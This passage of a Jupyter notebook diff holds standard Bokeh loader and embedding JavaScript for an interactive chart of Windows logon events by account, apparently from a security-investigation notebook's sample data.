run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"9de0d4d9-d28d-41c5-a66d-efb631445831\" data-root-id=\"2032\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"203f87f6-b759-4c41-aac1-eeaaa2beba25\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1940\"},{\"id\":\"1972\"}]},\"id\":\"2032\",\"type\":\"Column\"},{\"attributes\":{\"text\":\"Timeline: Logons by Account name\"},\"id\":\"1941\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"2037\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"data_source\":{\"id\":\"1936\"},\"glyph\":{\"id\":\"1992\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1993\"},\"view\":{\"id\":\"1995\"}},\"id\":\"1994\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_color\":{\"value\":\"#440154\"},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1992\",\"type\":\"Circle\"},{\"attributes\":{\"fill_color\":{\"value\":\"#208F8C\"},\"line_color\":{\"value\":\"#208F8C\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1997\",\"type\":\"Circle\"},{\"attributes\":{\"end\":1547530591064.3,\"start\":1547515271728.7},\"id\":\"1943\",\"type\":\"Range1d\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1993\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"1947\",\"type\":\"LinearScale\"},{\"attributes\":{\"overlay\":{\"id\":\"2007\"},\"x_range\":{\"id\":\"1943\"},\"y_range\":null},\"id\":\"2006\",\"type\":\"RangeTool\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":\"10px\"},\"id\":\"1988\",\"type\":\"Title\"},{\"attributes\":{\"source\":{\"id\":\"1936\"}},\"id\":\"1995\",\"type\":\"CDSView\"},{\"attributes\":{\"data_source\":{\"id\":\"1937\"},\"glyph\":{\"id\":\"1997\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1998\"},\"view\":{\"id\":\"2000\"}},\"id\":\"1999\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"data\":{\"Account\":[\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\"],\"LogonType\":[4,4],\"TargetLogonId\":[\"0xfaac27\",\"0xf0c9d6\"],\"TimeGenerated\":{\"__ndarray__\":\"AEA88/6EdkIAIBxK/IR2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[2]},\"index\":[0,5],\"y_index\":[0,0]},\"selected\":{\"id\":\"2043\"},\"selection_policy\":{\"id\":\"2044\"}},\"id\":\"1936\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"data\":{\"Account\":[\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\"],\"LogonType\":[5,5,5,5,5,5,5,5,5,5,5],\"TargetLogonId\":[\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"TimeGenerated\":{\"__ndarray__\":\"AHCb8/6EdkIA0CX1/oR2QgBQCfb+hHZCABCzePiEdkIAUEV5+IR2QgAQTWn2hHZCAPDeafaEdkIAQE/J8oR2QgCgGfTyhHZCAJDayPeEdkIAsG3J94R2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[11]},\"index\":[1,3,4,6,7,8,9,10,11,12,13],\"y_index\":[2,2,2,2,2,2,2,2,2,2,2]},\"selected\":{\"id\":\"2047\"},\"selection_policy\":{\"id\":\"2048\"}},\"id\":\"1938\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"label\":{\"value\":\"NT AUTHORITY\\\\SYSTEM\"},\"renderers\":[{\"id\":\"2028\"}]},\"id\":\"2030\",\"type\":\"LegendItem\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#208F8C\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#208F8C\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1998\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"1949\",\"type\":\"LinearScale\"},{\"attributes\":{\"fill_color\":{\"value\":\"#FDE724\"},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2002\",\"type\":\"Circle\"},{\"attributes\":{\"source\":{\"id\":\"1937\"}},\"id\":\"2000\",\"type\":\"CDSView\"},{\"attributes\":{\"data_source\":{\"id\":\"1938\"},\"glyph\":{\"id\":\"2002\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2003\"},\"view\":{\"id\":\"2005\"}},\"id\":\"2004\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"end\":2.3333333333333335,\"start\":-0.3333333333333333},\"id\":\"1945\",\"type\":\"Range1d\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"1973\",\"type\":\"Title\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#440154\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2014\",\"type\":\"Scatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2003\",\"type\":\"Circle\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"2007\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"data\":{\"Account\":[\"MSTICAlertsWin1\\\\adm1nistrator\"],\"LogonType\":[3],\"TargetLogonId\":[\"0xfb5ee6\"],\"TimeGenerated\":{\"__ndarray__\":\"ALAP9P6EdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[1]},\"index\":[2],\"y_index\":[1]},\"selected\":{\"id\":\"2045\"},\"selection_policy\":{\"id\":\"2046\"}},\"id\":\"1937\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"source\":{\"id\":\"1938\"}},\"id\":\"2005\",\"type\":\"CDSView\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1963\",\"type\":\"PanTool\"},{\"attributes\":{\"label\":{\"value\":\"MSTICAlertsWin1\\\\adm1nistrator\"},\"renderers\":[{\"id\":\"2022\"}]},\"id\":\"2024\",\"type\":\"LegendItem\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"2011\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"label\":{\"value\":\"MSTICAlertsWin1\\\\MSTICAdmin\"},\"renderers\":[{\"id\":\"2016\"}]},\"id\":\"2018\",\"type\":\"LegendItem\"},{\"attributes\":{\"source\":{\"id\":\"1936\"}},\"id\":\"2017\",\"type\":\"CDSView\"},{\"attributes\":{\"axis\":{\"id\":\"1951\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1954\",\"type\":\"Grid\"},{\"attributes\":{\"active_multi\":{\"id\":\"2006\"},\"tools\":[{\"id\":\"2006\"}]},\"id\":\"1987\",\"type\":\"Toolbar\"},{\"attributes\":{\"formatter\":{\"id\":\"2037\"},\"major_label_policy\":{\"id\":\"2035\"},\"ticker\":{\"id\":\"1956\"},\"visible\":false},\"id\":\"1955\",\"type\":\"LinearAxis\"},{\"attributes\":{\"click_policy\":\"hide\",\"items\":[{\"id\":\"2030\"},{\"id\":\"2024\"},{\"id\":\"2018\"}],\"label_text_font_size\":\"8pt\",\"location\":\"center\"},\"id\":\"2031\",\"type\":\"Legend\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#208F8C\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#208F8C\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2020\",\"type\":\"Scatter\"},{\"attributes\":{\"source\":{\"id\":\"1937\"}},\"id\":\"2023\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2015\",\"type\":\"Scatter\"},{\"attributes\":{\"axis\":{\"id\":\"1955\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"1958\",\"type\":\"Grid\"},{\"attributes\":{\"data_source\":{\"id\":\"1936\"},\"glyph\":{\"id\":\"2014\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2015\"},\"view\":{\"id\":\"2017\"}},\"id\":\"2016\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"2011\"},\"major_label_policy\":{\"id\":\"2038\"},\"ticker\":{\"id\":\"1952\"}},\"id\":\"1951\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#FDE724\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2026\",\"type\":\"Scatter\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"2049\"},{\"id\":\"2050\"},{\"id\":\"2051\"},{\"id\":\"2052\"},{\"id\":\"2053\"},{\"id\":\"2054\"},{\"id\":\"2055\"},{\"id\":\"2056\"},{\"id\":\"2057\"},{\"id\":\"2058\"},{\"id\":\"2059\"},{\"id\":\"2060\"}]},\"id\":\"1952\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#208F8C\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#208F8C\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2021\",\"type\":\"Scatter\"},{\"attributes\":{\"data_source\":{\"id\":\"1937\"},\"glyph\":{\"id\":\"2020\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2021\"},\"view\":{\"id\":\"2023\"}},\"id\":\"2022\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1956\",\"type\":\"BasicTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"2052\",\"type\":\"DaysTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"2051\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2027\",\"type\":\"Scatter\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"2053\",\"type\":\"DaysTicker\"},{\"attributes\":{\"source\":{\"id\":\"1938\"}},\"id\":\"2029\",\"type\":\"CDSView\"},{\"attributes\":{\"data_source\":{\"id\":\"1938\"},\"glyph\":{\"id\":\"2026\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2027\"},\"view\":{\"id\":\"2029\"}},\"id\":\"2028\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"formatter\":{\"id\":\"1989\"},\"major_label_policy\":{\"id\":\"2040\"},\"ticker\":{\"id\":\"1984\"}},\"id\":\"1983\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"tooltips\":[[\"LogonType\",\"@LogonType\"],[\"Account\",\"@Account\"],[\"TimeGenerated\",\"@TimeGenerated{%F %T.%3N}\"],[\"TargetLogonId\",\"@TargetLogonId\"]]},\"id\":\"1939\",\"type\":\"HoverTool\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"2056\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"below\":[{\"id\":\"1951\"}],\"center\":[{\"id\":\"1954\"},{\"id\":\"1958\"}],\"height\":200,\"left\":[{\"id\":\"1955\"},{\"id\":\"2031\"}],\"min_border_left\":50,\"renderers\":[{\"id\":\"2016\"},{\"id\":\"2022\"},{\"id\":\"2028\"}],\"title\":{\"id\":\"1941\"},\"toolbar\":{\"id\":\"1965\"},\"width\":900,\"x_range\":{\"id\":\"1943\"},\"x_scale\":{\"id\":\"1947\"},\"y_range\":{\"id\":\"1945\"},\"y_scale\":{\"id\":\"1949\"}},\"id\":\"1940\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"2054\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"2055\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"2057\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"2058\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"2059\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1962\",\"type\":\"SaveTool\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"2062\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"1939\"},{\"id\":\"1959\"},{\"id\":\"1960\"},{\"id\":\"1961\"},{\"id\":\"1962\"},{\"id\":\"1963\"}]},\"id\":\"1965\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"2073\",\"type\":\"YearsTicker\"},{\"attributes\":{},\"id\":\"2047\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"2060\",\"type\":\"YearsTicker\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"2049\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"2038\",\"type\":\"AllLabels\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"1964\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"2065\",\"type\":\"DaysTicker\"},{\"attributes\":{\"below\":[{\"id\":\"1983\"},{\"id\":\"1988\"}],\"center\":[{\"id\":\"1986\"}],\"height\":120,\"renderers\":[{\"id\":\"1994\"},{\"id\":\"1999\"},{\"id\":\"2004\"}],\"title\":{\"id\":\"1973\"},\"toolbar\":{\"id\":\"1987\"},\"toolbar_location\":null,\"width\":900,\"x_range\":{\"id\":\"1975\"},\"x_scale\":{\"id\":\"1979\"},\"y_range\":{\"id\":\"1977\"},\"y_scale\":{\"id\":\"1981\"}},\"id\":\"1972\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"2040\",\"type\":\"AllLabels\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"2063\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"1979\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1961\",\"type\":\"ResetTool\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"2064\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"1981\",\"type\":\"LinearScale\"},{\"attributes\":{\"overlay\":{\"id\":\"1964\"}},\"id\":\"1960\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"2066\",\"type\":\"DaysTicker\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"2062\"},{\"id\":\"2063\"},{\"id\":\"2064\"},{\"id\":\"2065\"},{\"id\":\"2066\"},{\"id\":\"2067\"},{\"id\":\"2068\"},{\"id\":\"2069\"},{\"id\":\"2070\"},{\"id\":\"2071\"},{\"id\":\"2072\"},{\"id\":\"2073\"}]},\"id\":\"1984\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"2069\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"2067\",\"type\":\"DaysTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1959\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"2068\",\"type\":\"DaysTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1983\"},\"ticker\":null},\"id\":\"1986\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2048\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"2070\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"2043\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"2045\",\"type\":\"Selection\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"2071\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"end\":1547531229369.95,\"start\":1547514633423.05},\"id\":\"1975\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"2046\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"2050\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"2044\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"2072\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1989\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{},\"id\":\"2035\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"1977\",\"type\":\"DataRange1d\"}],\"root_ids\":[\"2032\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"203f87f6-b759-4c41-aac1-eeaaa2beba25\",\"root_ids\":[\"2032\"],\"roots\":{\"2032\":\"9de0d4d9-d28d-41c5-a66d-efb631445831\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "2032"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"2279\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"2279\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = 